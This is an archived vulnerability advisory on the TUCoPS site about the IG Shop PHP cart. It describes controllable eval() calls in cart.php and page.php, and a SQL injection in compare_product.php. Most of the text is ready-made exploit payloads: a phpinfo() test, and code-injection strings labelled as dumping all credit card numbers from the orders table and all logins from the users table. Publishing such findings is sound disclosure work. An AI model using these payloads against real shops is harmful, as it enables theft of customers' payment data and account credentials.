TUCoPS :: HP Unsorted I :: c07-1668.htm

IG Shop remote code execution
IG Shop remote code execution
IG Shop remote code execution

"If eval is the answer,  then you are asking the wrong question."

ig-shop suffers from two eval's that can be controlled by an attacker:;phpinfo();// 
./cart.php line 692:
eval ("cart_$action();");;phpinfo();// 
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders 
Some of these variables can be decoded using the unserlize()  funciton.

Dumps all logins:;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users 

sql injection works regardless of magic_quotes_gpc. 
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks. 

vendor's page:http://www.igeneric.co.uk/ 

By Michael Brooks. 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH